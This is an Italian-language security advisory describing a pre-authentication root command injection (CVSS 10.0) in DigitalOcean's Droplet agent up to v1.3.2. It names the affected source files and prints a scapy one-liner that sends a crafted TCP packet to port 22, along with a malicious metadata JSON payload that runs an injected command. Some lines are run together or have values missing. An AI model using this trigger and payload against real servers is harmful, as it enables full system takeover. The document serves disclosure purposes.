
Critica RCE Root Pre-Autenticazione (CVSS 10.0) nell'Agente Droplet di DigitalOcean fino alla v1.3.2 tramite Iniezione di Comandi.
RCE critica pre-autenticazione come root (CVSS 10.0) nell'agente Droplet di DigitalOcean fino alla v1.3.2 tramite command injection.
È stata scoperta una vulnerabilità critica di command injection nell'agente Droplet di DigitalOcean (tutte le versioni fino alla 1.3.2 inclusa). Questa falla consente a un attaccante di ottenere Remote Code Execution (RCE) con privilegi di root senza alcuna autenticazione.
Scopritore: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research
La vulnerabilità risiede nel componente actioner per la risoluzione dei problemi:
internal/troubleshooting/actioner/actioner.gointernal/troubleshooting/command/exec.goL'agente elabora i metadati dal servizio locale () ed esegue i comandi dall'array senza una corretta sanificazione.
169.254.169.254TroubleshootingAgent.RequestingL'agente viene attivato da uno specifico pacchetto TCP sulla porta 22:
Attivare il fetch:
python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"
Payload di metadati dannosi:
{
"troubleshooting_agent": {
"requesting": ["command:id > /tmp/pwned"]
}
}
Impatto Punteggio CVSS: 10.0 (Critico)
Privilegi richiesti: Nessuno
Risultato: Compromissione completa del sistema (accesso root)
